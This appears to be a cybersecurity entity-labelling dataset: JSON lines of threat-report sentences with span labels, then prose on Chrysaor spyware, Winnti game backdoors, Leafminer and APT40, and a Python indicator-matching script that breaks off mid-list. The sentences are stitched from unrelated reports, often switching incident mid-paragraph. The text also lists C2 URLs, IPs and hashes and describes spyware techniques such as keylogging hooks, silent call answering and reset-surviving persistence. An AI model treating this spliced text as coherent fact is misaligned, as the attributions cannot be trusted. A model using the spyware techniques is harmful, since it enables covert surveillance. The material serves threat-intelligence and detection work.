"Organization"}, {"start": 336, "end": 341, "label": "Organization"}, {"start": 344, "end": 357, "label": "Indicator"}, {"start": 358, "end": 376, "label": "Indicator"}, {"start": 405, "end": 447, "label": "Organization"}]} {"text": "As Lookout first reported more than eight months ago , the problem with Shedun/HummingBad and similar malicious app families that silently exploit Android rooting vulnerabilities is that the infections can survive normal factory resets . Leafminer attempts to infiltrate target networks through various means of intrusion : watering hole websites , vulnerability scans of network services on the internet , and brute-force login attempts . APT33 : 5.79.127.177 mypsh.ddns.net . 
\" Learn about indicators of compromise and their role in detection and response in Data Protection 101 , our series on the fundamentals of information security .", "spans": [{"start": 3, "end": 10, "label": "Organization"}, {"start": 72, "end": 89, "label": "Malware"}, {"start": 147, "end": 178, "label": "Vulnerability"}, {"start": 238, "end": 247, "label": "Organization"}, {"start": 440, "end": 445, "label": "Organization"}, {"start": 448, "end": 460, "label": "Indicator"}, {"start": 461, "end": 475, "label": "Indicator"}, {"start": 561, "end": 580, "label": "Organization"}]} {"text": "Lookout said in its own blog post published Wednesday that its threat detection network has recently observed a surge of Shedun attacks , indicating the scourge wo n't be going away any time soon . The researchers found that there are common elements in the macro and in the first- stage RAT used in this campaign , with former campaigns of the NICKEL ACADEMY ( Lazarus ) threat group . APT33 : 192.119.15.35 [REDACTED].ddns.net . The threat actor cleared Windows Event Logs on affected backend Exchange servers so further information was not available regarding the PowerShell commands leveraged by the threat actors .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 121, "end": 127, "label": "Malware"}, {"start": 288, "end": 291, "label": "System"}, {"start": 345, "end": 359, "label": "Organization"}, {"start": 362, "end": 369, "label": "Organization"}, {"start": 372, "end": 384, "label": "Organization"}, {"start": 387, "end": 392, "label": "Organization"}, {"start": 395, "end": 408, "label": "Indicator"}, {"start": 409, "end": 428, "label": "Indicator"}, {"start": 435, "end": 447, "label": "Organization"}, {"start": 604, "end": 617, "label": "Organization"}]} {"text": "An investigation of Chrysaor Malware on Android 03 April 2017 Google is constantly working to improve our systems that protect users from Potentially Harmful Applications ( PHAs ) . 
During our investigation , there was a breakthrough discovery that helped connect Leafminer to a number of attacks observed on systems in the Middle East and identify the toolkit used in the group 's efforts of intrusion , lateral movement , and exfiltration . APT33 : 192.119.15.35 [REDACTED].ddns.net . As such , we \u2019ve seen a growing number of reports of victims who are targeted with commercial spyware .", "spans": [{"start": 20, "end": 28, "label": "Malware"}, {"start": 40, "end": 47, "label": "System"}, {"start": 62, "end": 68, "label": "Organization"}, {"start": 264, "end": 273, "label": "Organization"}, {"start": 373, "end": 378, "label": "Organization"}, {"start": 443, "end": 448, "label": "Organization"}, {"start": 451, "end": 464, "label": "Indicator"}, {"start": 465, "end": 484, "label": "Indicator"}, {"start": 511, "end": 588, "label": "Indicator"}]} {"text": "Usually , PHA authors attempt to install their harmful apps on as many devices as possible . As of early June 2018 , the server hosted 112 files in a subdirectory that could be accessed through a public web shell planted by the Leafminer . APT33 : 192.119.15.35 [REDACTED].ddns.net . 
The series features interviews with security experts and journalists , Ashley Madison executives , victims of the breach and jilted spouses .", "spans": [{"start": 196, "end": 212, "label": "System"}, {"start": 228, "end": 237, "label": "Organization"}, {"start": 240, "end": 245, "label": "Organization"}, {"start": 248, "end": 261, "label": "Indicator"}, {"start": 262, "end": 281, "label": "Indicator"}, {"start": 320, "end": 336, "label": "Organization"}, {"start": 341, "end": 352, "label": "Organization"}, {"start": 355, "end": 380, "label": "Organization"}, {"start": 383, "end": 404, "label": "Organization"}, {"start": 409, "end": 423, "label": "Organization"}]} {"text": "However , a few PHA authors spend substantial effort , time , and money to create and install their harmful app on one or a very small number of devices . As of early June 2018 , the server hosted 112 files in a subdirectory that could be accessed through a public web shell planted by the attackers . APT33 : 192.119.15.36 [REDACTED].ddns.net . While a sudden dip in attacks is n't too unusual for top ransomware gangs , it 's worth mentioning that in last month \u2019s review we speculated that Royal might be going through a rebrand .", "spans": [{"start": 258, "end": 274, "label": "System"}, {"start": 290, "end": 299, "label": "Organization"}, {"start": 302, "end": 307, "label": "Organization"}, {"start": 310, "end": 323, "label": "Indicator"}, {"start": 324, "end": 343, "label": "Indicator"}, {"start": 493, "end": 498, "label": "Organization"}]} {"text": "This is known as a targeted attack . The Leafminer 's post-compromise toolkit suggests that Leafminer is looking for email data , files , and database servers on compromised target systems . APT33 : 192.119.15.37 mynetwork.ddns.net . 
What \u2019s more , two other vulnerabilities in MOVEit were found while new victims were still coming forward .", "spans": [{"start": 41, "end": 50, "label": "Organization"}, {"start": 92, "end": 101, "label": "Organization"}, {"start": 191, "end": 196, "label": "Organization"}, {"start": 199, "end": 212, "label": "Indicator"}, {"start": 213, "end": 231, "label": "Indicator"}, {"start": 278, "end": 284, "label": "System"}]} {"text": "In this blog post , we describe Chrysaor , a newly discovered family of spyware that was used in a targeted attack on a small number of Android devices , and how investigations like this help Google protect Android users from a variety of threats . Researching the hacker handle MagicCoder results in references to the Iranian hacking forum Ashiyane as well as defacements by the Iranian hacker group Sun Army . APT33 : 192.119.15.38 [REDACTED].ddns.net . None Ensure X - Forwarded - For header is configured to log true external IP addresses for request to proxied services .", "spans": [{"start": 32, "end": 40, "label": "Malware"}, {"start": 136, "end": 143, "label": "System"}, {"start": 192, "end": 198, "label": "Organization"}, {"start": 207, "end": 214, "label": "System"}, {"start": 265, "end": 271, "label": "Organization"}, {"start": 341, "end": 349, "label": "Organization"}, {"start": 388, "end": 400, "label": "Organization"}, {"start": 401, "end": 409, "label": "Organization"}, {"start": 412, "end": 417, "label": "Organization"}, {"start": 420, "end": 433, "label": "Indicator"}, {"start": 434, "end": 453, "label": "Indicator"}]} {"text": "What is Chrysaor ? Targeted regions included in the list of Leafminer are Saudi Arabia , United Arab Emirates , Qatar , Kuwait , Bahrain , Egypt , Israel , and Afghanistan . APT33 : 192.119.15.39 remote-server.ddns.net . 
Instead , it appeared that corresponding requests were made directly through the Outlook Web Application ( OWA ) endpoint , indicating a previously undisclosed exploit method for Exchange .", "spans": [{"start": 8, "end": 16, "label": "Malware"}, {"start": 60, "end": 69, "label": "Organization"}, {"start": 174, "end": 179, "label": "Organization"}, {"start": 182, "end": 195, "label": "Indicator"}, {"start": 196, "end": 218, "label": "Indicator"}, {"start": 302, "end": 342, "label": "System"}, {"start": 400, "end": 408, "label": "System"}]} {"text": "Chrysaor is spyware believed to be created by NSO Group Technologies , specializing in the creation and sale of software and infrastructure for targeted attacks . Our investigation of Leafminer started with the discovery of JavaScript code on several compromised websites in the Middle East . APT33 : 192.119.15.40 [REDACTED].ddns.net . None Ensure X - Forwarded - For header is configured to log true external IP addresses for request to proxied services .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 46, "end": 68, "label": "Organization"}, {"start": 184, "end": 193, "label": "Organization"}, {"start": 224, "end": 239, "label": "System"}, {"start": 251, "end": 271, "label": "System"}, {"start": 293, "end": 298, "label": "Organization"}, {"start": 301, "end": 314, "label": "Indicator"}, {"start": 315, "end": 334, "label": "Indicator"}]} {"text": "Chrysaor is believed to be related to the Pegasus spyware that was first identified on iOS and analyzed by Citizen Lab and Lookout . This included the Fuzzbunch framework that was part of an infamous leak of exploits and tools by the Shadow Brokers in April 2017 . APT33 : 192.119.15.41 mynetwork.cf . 
Lucifer can use the Stratum protocol on port 10001 for communication between the cryptojacking bot and the mining server.[7 ] Magic Hound malware has used IRC for C2.[8][9 ] Adversaries can also use NETEAGLE to establish an RDP connection with a controller over TCP/7519 .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 42, "end": 49, "label": "Malware"}, {"start": 87, "end": 90, "label": "System"}, {"start": 107, "end": 118, "label": "Organization"}, {"start": 123, "end": 130, "label": "Organization"}, {"start": 151, "end": 160, "label": "System"}, {"start": 234, "end": 248, "label": "Organization"}, {"start": 265, "end": 270, "label": "Organization"}, {"start": 273, "end": 286, "label": "Indicator"}, {"start": 287, "end": 299, "label": "Indicator"}, {"start": 322, "end": 338, "label": "System"}, {"start": 342, "end": 352, "label": "Indicator"}, {"start": 383, "end": 400, "label": "System"}, {"start": 409, "end": 425, "label": "System"}, {"start": 428, "end": 447, "label": "Malware"}, {"start": 457, "end": 460, "label": "System"}, {"start": 465, "end": 473, "label": "System"}, {"start": 476, "end": 487, "label": "Organization"}, {"start": 501, "end": 509, "label": "System"}]} {"text": "Late last year , after receiving a list of suspicious package names from Lookout , we discovered that a few dozen Android devices may have installed an application related to Pegasus , which we named Chrysaor . Leafminer has developed exploit payloads for this framework ( Table 2 ) that deliver custom malware through attacks against SMB vulnerabilities described by Microsoft . APT33 : 192.119.15.42 [REDACTED].ddns.net . 
With an understanding of the basic motivations that drive cyberattacks organizations can better identify where their own assets may be at risk and thereby more efficiently and effectively address identified risks .", "spans": [{"start": 73, "end": 80, "label": "Organization"}, {"start": 114, "end": 121, "label": "System"}, {"start": 175, "end": 182, "label": "Malware"}, {"start": 200, "end": 208, "label": "Malware"}, {"start": 211, "end": 220, "label": "Organization"}, {"start": 335, "end": 354, "label": "Vulnerability"}, {"start": 368, "end": 377, "label": "Organization"}, {"start": 380, "end": 385, "label": "Organization"}, {"start": 388, "end": 401, "label": "Indicator"}, {"start": 402, "end": 421, "label": "Indicator"}, {"start": 482, "end": 508, "label": "Organization"}]} {"text": "Although the applications were never available in Google Play , we immediately identified the scope of the problem by using Verify Apps . The EternalBlue exploit from the framework received worldwide attention after being used in the ransomware campaigns WannaCry in May and Petya / NotPetya in June 2017 . gaming industry scope attackers asia . Significantly , Anonymous Sudan has caused significant disruptions at a level not observed by KillNet affiliates previously .", "spans": [{"start": 50, "end": 61, "label": "System"}, {"start": 124, "end": 135, "label": "System"}, {"start": 142, "end": 161, "label": "Vulnerability"}, {"start": 275, "end": 280, "label": "System"}, {"start": 283, "end": 291, "label": "System"}, {"start": 362, "end": 377, "label": "Organization"}]} {"text": "We gathered information from affected devices , and concurrently , attempted to acquire Chrysaor apps to better understand its impact on users . The Leafminer operators use EternalBlue to attempt lateral movement within target networks from compromised staging servers . 
This is not the first time the gaming industry has been targeted by attackers who compromise game developers , insert backdoors into a game\u2019s build environment , and then have their malware distributed as legitimate software . securityd-555549440fca1d2f1e613094b0c768d393f83d7f", "spans": [{"start": 88, "end": 96, "label": "Malware"}, {"start": 149, "end": 158, "label": "Organization"}, {"start": 159, "end": 168, "label": "Organization"}, {"start": 173, "end": 184, "label": "Vulnerability"}, {"start": 498, "end": 548, "label": "Malware"}]} {"text": "We 've contacted the potentially affected users , disabled the applications on affected devices , and implemented changes in Verify Apps to protect all users . Symantec also observed attempts by Leafminer to scan for the Heartbleed vulnerability ( CVE-2014-0160 ) from an attacker-controlled IP address . In April 2013 , Kaspersky Lab reported that a popular game was altered to include a backdoor in 2011 . This is possibly an indication of compromised login credentials , and it can be verified by further investigating the login attempts and recent activities by the same user .", "spans": [{"start": 125, "end": 136, "label": "System"}, {"start": 160, "end": 168, "label": "Organization"}, {"start": 195, "end": 204, "label": "Organization"}, {"start": 221, "end": 245, "label": "Vulnerability"}, {"start": 248, "end": 261, "label": "Vulnerability"}, {"start": 321, "end": 334, "label": "Organization"}]} {"text": "What is the scope of Chrysaor ? Furthermore , the Leafminer arsenal server hosted a Python script to scan for this vulnerability . That attack was attributed to perpetrators Kaspersky called the Winnti Group . 
In reality he stated he simply loved to rob banks .", "spans": [{"start": 21, "end": 29, "label": "Malware"}, {"start": 50, "end": 59, "label": "Organization"}, {"start": 84, "end": 97, "label": "System"}, {"start": 174, "end": 183, "label": "Organization"}, {"start": 195, "end": 201, "label": "Organization"}]} {"text": "Chrysaor was never available in Google Play and had a very low volume of installs outside of Google Play . Another intrusion approach used by Leafminer seems a lot less sophisticated than the previously described methods but can be just as effective : using specific hacktools to guess the login passwords for services exposed by a targeted system . Yet again , new supply-chain attacks recently caught the attention of ESET Researchers . The attackers also leveraged DLL sideloading in that campaign to load their HyperBro malware .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 32, "end": 43, "label": "System"}, {"start": 93, "end": 104, "label": "System"}, {"start": 142, "end": 151, "label": "Organization"}, {"start": 267, "end": 276, "label": "System"}, {"start": 420, "end": 424, "label": "Organization"}, {"start": 443, "end": 452, "label": "Organization"}, {"start": 492, "end": 500, "label": "Organization"}, {"start": 515, "end": 531, "label": "Malware"}]} {"text": "Among the over 1.4 billion devices protected by Verify Apps , we observed fewer than 3 dozen installs of Chrysaor on victim devices . Commands found in a readme text that was stored in a ZIP archive together with the hacktool THC Hydra in Leafminer 's tool arsenal represent online dictionary attacks on Microsoft Exchange and Remote Desktop Protocol services of regional government servers in Saudi Arabia . This time , two games and one gaming platform application were compromised to include a backdoor . 
When the victim opened an archive , a second stage dropper executed and a WAV file played like a real voicemail .", "spans": [{"start": 48, "end": 59, "label": "System"}, {"start": 105, "end": 113, "label": "Malware"}, {"start": 226, "end": 235, "label": "System"}, {"start": 239, "end": 248, "label": "Organization"}]} {"text": "These devices were located in the following countries : How we protect you To protect Android devices and users , Google Play provides a complete set of security services that update outside of platform releases . Symantec identified two strains of custom malware used by the Leafminer group : Trojan.Imecab and Backdoor.Sorgu . Given that these attacks were mostly targeted against Asia and the gaming industry , it shouldn\u2019t be surprising they are the work of the group described in Kaspersky \u2019s \u201c Winnti \u2013 More than just a game \u201d . Geographically , most victims are located in Europe , specifically Italy .", "spans": [{"start": 86, "end": 93, "label": "System"}, {"start": 114, "end": 125, "label": "System"}, {"start": 214, "end": 222, "label": "Organization"}, {"start": 276, "end": 291, "label": "Organization"}, {"start": 294, "end": 307, "label": "System"}, {"start": 312, "end": 326, "label": "System"}, {"start": 485, "end": 494, "label": "Organization"}, {"start": 500, "end": 506, "label": "Organization"}]} {"text": "Users do n't have to install any additional security services to keep their devices safe . Leafminer is a highly active group , responsible for targeting a range of organizations across the Middle East . Although the malware uses different configurations in each case , the three affected software products included the same backdoor code and were launched using the same mechanism . 
The malware will then create the file RECOVERFILES.txt in each scanned folder .", "spans": [{"start": 91, "end": 100, "label": "Organization"}, {"start": 120, "end": 125, "label": "Organization"}, {"start": 388, "end": 395, "label": "Malware"}, {"start": 422, "end": 461, "label": "Indicator"}]} {"text": "In 2016 , these services protected over 1.4 billion devices , making Google one of the largest providers of on-device security services in the world : Identify PHAs using people , systems in the cloud , and data sent to us from devices Warn users about or blocking users from installing PHAs Continually scan devices for PHAs and other harmful threats Additionally , we are providing detailed technical information to help the security industry in our collective work against PHAs . Leafminer appears to be based in Iran and seems to be eager to learn from and capitalize on tools and techniques used by more advanced threat actors . While two of the compromised products no longer include the backdoor , one of the affected developers is still distributing the trojanized version : ironically , the game is named Infestation , and is produced by Thai developer Electronics Extreme . One of the most common ways that cybercriminals earn money is by selling data on the black market .", "spans": [{"start": 69, "end": 75, "label": "Organization"}, {"start": 483, "end": 492, "label": "Organization"}, {"start": 618, "end": 631, "label": "Organization"}, {"start": 862, "end": 881, "label": "Organization"}, {"start": 917, "end": 931, "label": "Organization"}]} {"text": "What do I need to do ? Leafminer also utilized Process Doppelganging , a detection evasion technique first discussed at the Black Hat EU conference last year . We have tried informing them several times , through various channels , since early February , but without apparent success . 
If network logs were analyzed individually across that journey , it is likely that all requests were either in compliance with the policies embedded into the firewalls at every node , or some unpatched vulnerability prevented a control action against unauthorized data transfers .", "spans": [{"start": 23, "end": 32, "label": "Organization"}, {"start": 289, "end": 301, "label": "Indicator"}, {"start": 369, "end": 467, "label": "Indicator"}, {"start": 473, "end": 564, "label": "Vulnerability"}]} {"text": "It is extremely unlikely you or someone you know was affected by Chrysaor malware . Dragos has identified Leafminer group targeting access operations in the electric utility sector . Let\u2019s look at how the malicious payload is embedded and then look into the details of the backdoor itself . On June 25 , 2022 , KillNet messaging suggested that Conti was ready to fight , that Lithuania was its new testing ground for DDoS attacks , and that its \" Zarya \" hackers were preparing for cyber operations .", "spans": [{"start": 65, "end": 73, "label": "Malware"}, {"start": 84, "end": 90, "label": "Organization"}, {"start": 106, "end": 121, "label": "Organization"}, {"start": 157, "end": 180, "label": "Organization"}, {"start": 417, "end": 429, "label": "Organization"}, {"start": 447, "end": 452, "label": "Organization"}]} {"text": "Through our investigation , we identified less than 3 dozen devices affected by Chrysaor , we have disabled Chrysaor on those devices , and we have notified users of all known affected devices . Analysis of RASPITE tactics , techniques , and procedures ( TTPs ) indicate the group has been active in some form since early - to mid-2017 . The payload code is started very early during the execution of the backdoored executable file . 
The gang attacked 10 victims last month, the majority of them from the Information and Communications Technology (ICT) sector. Rhysida's encryption algorithm is relatively straightforward and uses the ChaCha20 encryption algorithm. Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them. Depending on the platform and on how the code is compiled, these vulnerabilities could lead to arbitrary code execution. Talos is disclosing these vulnerabilities despite no official fix from Open Babel.

Additionally, the improvements we made to our protections have been enabled for all users of our security services. No Chrysaor apps were on Google Play. To ensure you are fully protected against PHAs and other threats, we recommend these 5 basic steps:
• Install apps only from reputable sources: Install apps from a reputable source, such as Google Play.
• Enable a secure lock screen: Pick a PIN, pattern, or password that is easy for you to remember and hard for others to guess.
• Update your device: Keep your device up-to-date with the latest security patches.
• Verify Apps: Ensure Verify Apps is enabled.
• Locate your device: Practice finding your device with Android Device Manager because you are far more likely to lose your device than install a PHA.

How does Chrysaor work? To install Chrysaor, we believe an attacker coaxed specifically targeted individuals to download the malicious software onto their device. Once Chrysaor is installed, a remote operator is able to surveil the victim's activities on the device and within the vicinity, leveraging microphone, camera, data collection, and logging and tracking application activities on communication apps such as phone and SMS. One representative sample Chrysaor app that we analyzed was tailored to devices running Jellybean (4.3) or earlier. The following is a review of the scope and impact of the Chrysaor app named com.network.android tailored for a Samsung device target, with SHA256 digest ade8bef0ac29fa363fc9afd958af0074478aef650adeb0318517b48bd996d5d5.

Upon installation, the app uses known framaroot exploits to escalate privileges and break Android's application sandbox. If the targeted device is not vulnerable to these exploits, then the app attempts to use a superuser binary pre-positioned at /system/csk to elevate privileges. After escalating privileges, the app immediately protects itself and starts to collect data, by:
• Installing itself on the /system partition to persist across factory resets
• Removing Samsung's system update app (com.sec.android.fotaclient) and disabling auto-updates to maintain persistence (sets Settings.System.SOFTWARE_UPDATE_AUTO_UPDATE to 0)
• Deleting WAP push messages and changing WAP message settings, possibly for anti-forensic purposes

Active since at least 2014, the Leviathan has long-standing interest in maritime industries, naval defense contractors, and associated research institutions in the United States and Western Europe. The period between November 2014 and January 2015 marked one of the earlier instances in which Proofpoint observed persistent exploitation attempts by this actor. Between August 2 and 4, the Leviathan sent targeted spearphishing emails containing malicious URLs linking to documents to multiple defense contractors. The Leviathan also occasionally used macro-laden Microsoft Word documents to target other US research and development organizations during this period. On September 15 and 19, 2017, Proofpoint detected and blocked spearphishing emails from this group targeting a US shipbuilding company and a US university research center with military ties. The attachments exploited CVE-2017-8759, which was discovered and documented only five days prior to the campaign. Some of the documents exploited CVE-2017-0199 to deliver the payload.

RASPITE targeting includes entities in the US, Middle East, Europe, and East Asia. RASPITE's activity to date currently focuses on initial access operations within the electric utility sector. RASPITE overlaps significantly with Leafminer, as tracked by Symantec, which recently released a report on the group's activity in the Middle East. This means that the Leafminer group is targeting electric utilities. While the group has not yet demonstrated an ICS capability, RASPITE's recent targeting focus and methodology are clear indicators of necessary activity for initial intrusion operations into an IT network to prepare the way for later potential ICS events.

Over the course of three and a half years, OilRig has used various backdoors, starting with DanBot, as well as using the Shark backdoor in April 2021 before transitioning to the Milan backdoor and the new backdoor Marlin in August 2021.

COSMICENERGY is the latest example of specialized OT malware capable of causing cyber physical impacts, which are rarely discovered or disclosed. Mandiant identified a second sample on VirusTotal with the same self-signed certificate CN. This incident and last year's INDUSTROYER.V2 incident both show efforts to streamline OT attack capabilities through simplified deployment features. The eventual execution of the attack coincided with the start of a multi-day set of coordinated missile strikes on critical infrastructure across several Ukrainian cities, including the city in which the victim was located.

UNC2529 is a well-resourced and experienced group that has targeted multiple organizations across numerous industries in a global phishing campaign. New technologies are constantly introduced within the industry, and healthcare has experienced a rapid transition to the use of connected devices, which puts stress on security teams to keep up. However, com.docker.vmnat was removed from the system. Systems are compromised to enable them to then attack other systems.

Identifying suspicious login patterns based on NetScaler logs

Right after the PE entry point, the standard call to the C Runtime initialization (__scrt_common_main_seh) is hooked to launch the malicious payload before everything else. The code added to the executable decrypts and launches the backdoor in memory before resuming normal execution of the C Runtime initialization code and all the subsequent code of the host application. The actual malicious payload is quite small and only contains about 17 KB of code and data. The embedded payload data has a specific structure that is parsed by the added unpacking code. It includes an RC4 key (which is XORed with 0x37) that is used to decrypt a filename and the embedded DLL file. The configuration data is simply a whitespace-separated list of strings. The configuration consists of four fields:
• C&C server URL.
• Variable (t) used to determine the time to sleep in milliseconds before continuing the execution. The wait time is chosen randomly in the range 2/3 t to 5/3 t.
• A string identifying a campaign.
• A semicolon-separated list of executable filenames. If any of them are running, the backdoor stops its execution.
This may suggest that the malefactor changed a build configuration rather than the source code itself. The Winnti group diversified its targets to include enterprises such as those in pharmaceutics and telecommunications.
ESET researchers have identified five versions of the payload:
Winnti: a045939f 2018-07-11 15:45:57 https://bugcheck.xigncodeservice.com/Common/Lib/Common_bsod.php
Winnti: a260dcf1 2018-07-11 15:45:57 https://bugcheck.xigncodeservice.com/Common/Lib/Common_Include.php
Winnti: dde82093 2018-07-11 15:45:57 https://bugcheck.xigncodeservice.com/Common/Lib/common.php
Winnti: 44260a1d 2018-08-15 10:59:09 https://dump.gxxservice.com/common/up/up_base.php
Winnti: 8272c1f4 2018-11-01 13:16:24 https://nw.infestexe.com/version/last.php
In the first three variants, the code was not recompiled, but the configuration data was edited in the DLL file itself. The rest of the content is a byte-for-byte copy. Domain names were carefully chosen to look like they are related to the game or application publisher. The apex domain was set to redirect to a relevant legitimate site using the Namecheap redirection service, while the subdomain points to the malicious C&C server.
Winnti: xigncodeservice.com 2018-07-10 09:18:17 https://namu.wiki/w/XIGNCODE
Winnti: gxxservice.com 2018-08-14 13:53:41 None or unknown
Winnti: infestexe.com 2018-11-07 08:46:44 https://www.facebook.com/infest.in.th
Winnti: bugcheck.xigncodeservice.com 167.99.106.49, 178.128.180.206 DigitalOcean
Winnti: dump.gxxservice.com 142.93.204.230 DigitalOcean
Winnti: nw.infestexe.com 138.68.14.195 DigitalOcean
At the time of writing, none of the domains resolve and the C&C servers are not responding. The group also engaged in the theft of digital certificates, which they then used to sign their malware to make it stealthier.

The Leviathan, whose espionage activities primarily focus on targets in the US and Western Europe with military ties, has been active since at least 2014. The Leviathan generally emailed Microsoft Excel documents with malicious macros to US universities with military interests, most frequently related to the Navy. Known targets of the Leviathan have been involved in the maritime industry, as well as research institutes, academic organizations, and private firms in the United States. The Leviathan group has specifically targeted engineering, transportation, and the defense industry, especially where these sectors overlap with maritime technologies.

The campaign is linked to a group of suspected Chinese cyber espionage actors we have tracked since 2013, dubbed TEMP.Periscope. The current campaign is a sharp escalation of detected activity since summer 2017. Since early 2018, FireEye (including our FireEye as a Service (FaaS), Mandiant Consulting, and iSIGHT Intelligence teams) has been tracking an ongoing wave of intrusions targeting engineering and maritime entities, especially those connected to South China Sea issues. Active since at least 2013, TEMP.Periscope has primarily focused on maritime-related targets across multiple verticals, including engineering firms, shipping and transportation, manufacturing, defense, government offices, and research universities. TEMP.Periscope overlaps in targeting, as well as tactics, techniques, and procedures (TTPs), with TEMP.Jumper, a group that also overlaps significantly with public reporting on NanHaiShu. The actor has conducted operations since at least 2013 in support of China's naval modernization effort. FireEye is highlighting a cyber espionage operation targeting crucial technologies and traditional intelligence targets from a China-nexus state-sponsored actor we call APT40. We believe APT40's emphasis on maritime issues and naval technology ultimately supports China's ambition to establish a blue-water navy. Within a year, APT40 was observed masquerading as a UUV manufacturer and targeting universities engaged in naval research. APT40 engages in broader regional targeting against traditional intelligence targets, especially organizations with operations in Southeast Asia. We assess with moderate confidence that APT40 is a state-sponsored Chinese cyber espionage operation. The actor's targeting is consistent with Chinese state interests, and there are multiple technical artifacts indicating the actor is based in China.

• Command-line execution of the MicroSCADA "Scilc.exe" binary and other native MicroSCADA binaries that may be leveraged to execute unauthorized SCIL programs/commands.
• Unauthorized network connections to MSSQL servers (TCP/1433) and irregular or unauthorized authentication.

At that time, Symantec observed the attackers breaching Saudi Arabian IT providers in an apparent supply chain attack designed to infect the customers with malware known as Syskit.

As we've discussed recently, there has been huge growth in the ransomware and extortion space, potentially linked to the plethora of leaked builders and source code related to various ransomware cartels. When the malware is executed, it attempts to run the following commands, most of which attempt to stop various security and backup related software. In September, the Department of the Treasury issued an advisory strongly discouraging consumers and organizations from making payments based on extortion attempts and encouraging them to strengthen their defense measures.

Once an actor was able to successfully achieve session hijacking, the threat actor performed actions including host and network reconnaissance of the victim environment, credential harvesting, and lateral movement via RDP. Instead, it appeared that corresponding requests were made directly through the Outlook Web Application (OWA) endpoint, indicating a previously undisclosed exploit method for Exchange.

The Platform can look for indicators across file attachments, embedded links, and more, and provide in-platform risk scoring. The file's name consists of six randomly generated alphanumeric characters. The initial beacon contains a hardcoded string added to the IP parameters. If the main function is called with only , it will take the path that is intended to connect to the MSSQL server and upload . If none are supplied to the main function, it will immediately fail due to attempting to utilize command line arguments that were not parsed yet. The motives have not yet been definitively determined, but are guessed to be the result of a one-off attempt to gather intelligence that potentially can be used in further phishing campaigns. An attacker may have more than a single motivation to target a particular organization. While there are several motivations for hackers, we've covered 6 of the most common ones in this article.

FinFisher exposed: A researcher's tale of defeating traps, tricks, and complex virtual machines (March 1, 2018). Office 365 Advanced Threat Protection (Office 365 ATP) blocked many notable zero-day exploits in 2017. In our analysis, one activity group stood out: NEODYMIUM.

• Starting content observers and the main task loop to receive remote commands and exfiltrate data

The app uses six techniques to collect user data:
• Repeated commands: use alarms to periodically repeat actions on the device to expose data, including gathering location data.
• Data collectors: dump all existing content on the device into a queue. Data collectors are used in conjunction with repeated commands to collect user data including SMS settings, SMS messages, call logs, browser history, calendar, contacts, emails, and messages from selected messaging apps, including WhatsApp, Twitter, Facebook, Kakao, Viber, and Skype, by making the /data/data directories of the apps world readable.
• Content observers: use Android's ContentObserver framework to gather changes in SMS, Calendar, Contacts, Cell info, Email, WhatsApp, Facebook, Twitter, Kakao, Viber, and Skype.
• Screenshots: captures an image of the current screen via the raw frame buffer.
• Keylogging: record input events by hooking IPCThreadState::Transact from /system/lib/libbinder.so, and intercepting android::parcel with the interface com.android.internal.view.IInputContext.
• RoomTap: silently answers a telephone call and stays connected in the background, allowing the caller to hear conversations within the range of the phone's microphone. If the user unlocks their device, they will see a black screen while the app drops the call, resets call settings and prepares for the user to interact with the device normally.

Finally, the app can remove itself in three ways:
• Via a command from the server
• Autoremove if the device has not been able to check in to the server after 60 days
• Via an antidote file: if /sdcard/MemosForNotes is present on the device, the Chrysaor app removes itself from the device.

Samples uploaded to VirusTotal
To encourage further research in the security community, we've uploaded these sample Chrysaor apps to VirusTotal.
Package Name | SHA256 digest | SHA1 certificate
com.network.android ade8bef0ac29fa363fc9afd958af0074478aef650adeb0318517b48bd996d5d5 44f6d1caa257799e57f0ecaf4e2e216178f4cb3d
com.network.android 3474625e63d0893fc8f83034e835472d95195254e1e4bdf99153b7c74eb44d86 516f8f516cc0fd8db53785a48c0a86554f75c3ba

Additional digests with links to Chrysaor
As a result of our investigation we have identified these additional Chrysaor-related apps.
Package Name | SHA256 digest | SHA1 certificate
com.network.android 98ca5f94638768e7b58889bb5df4584bf5b6af56b188da48c10a02648791b30c 516f8f516cc0fd8db53785a48c0a86554f75c3ba
com.network.android 5353212b70aa096d918e4eb6b49eb5ad8f59d9bec02d089e88802c01e707c3a1 44f6d1caa257799e57f0ecaf4e2e216178f4cb3d
com.binary.sms.receiver 9fae5d148b89001555132c896879652fe1ca633d35271db34622248e048c78ae 7771af1ad3a3d9c0b4d9b55260bb47c2692722cf
com.android.copy e384694d3d17cd88ec3a66c740c6398e07b8ee401320ca61e26bdf96c20485b4 7771af1ad3a3d9c0b4d9b55260bb47c2692722cf
com.android.copy 12e085ab85db887438655feebd249127d813e31df766f8c7b009f9519916e389 7771af1ad3a3d9c0b4d9b55260bb47c2692722cf
com.android.copy 6348104f8ef22eba5ac8ee737b192887629de987badbb1642e347d0dd01420f8 31a8633c2cd67ae965524d0b2192e9f14d04d016
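The Chrysaor indicators given above (package names, APK SHA256 digests, signing-certificate SHA1s, the /system/csk superuser binary, the removed com.sec.android.fotaclient updater, SOFTWARE_UPDATE_AUTO_UPDATE set to 0, and the /sdcard/MemosForNotes antidote file) can be correlated against a device inventory in one pass. The Python below is an added example, not Google's code; the package listing, hashes, setting value and file list it runs on are constructed here to stand in for the output of adb shell pm list packages -f, sha256sum of each APK, the APK signer fingerprint, settings get system SOFTWARE_UPDATE_AUTO_UPDATE and ls on the named paths. Matching on the signing certificate as well as the APK hash is what catches a recompiled variant the hash table does not yet list.

```python
import re

# Added example, not Google's code. Correlates the Chrysaor indicators quoted on the
# page against a device inventory. The inventory below is CONSTRUCTED; on a real
# device it would come from `adb shell pm list packages -f`, sha256sum of each APK,
# the APK signer certificate fingerprint, `settings get system
# SOFTWARE_UPDATE_AUTO_UPDATE`, and `ls` on the paths named on the page.

# (package, SHA256 of APK, SHA1 of signing certificate) -- rows from the page's tables
KNOWN_SAMPLES = [
    ("com.network.android", "ade8bef0ac29fa363fc9afd958af0074478aef650adeb0318517b48bd996d5d5", "44f6d1caa257799e57f0ecaf4e2e216178f4cb3d"),
    ("com.network.android", "3474625e63d0893fc8f83034e835472d95195254e1e4bdf99153b7c74eb44d86", "516f8f516cc0fd8db53785a48c0a86554f75c3ba"),
    ("com.network.android", "98ca5f94638768e7b58889bb5df4584bf5b6af56b188da48c10a02648791b30c", "516f8f516cc0fd8db53785a48c0a86554f75c3ba"),
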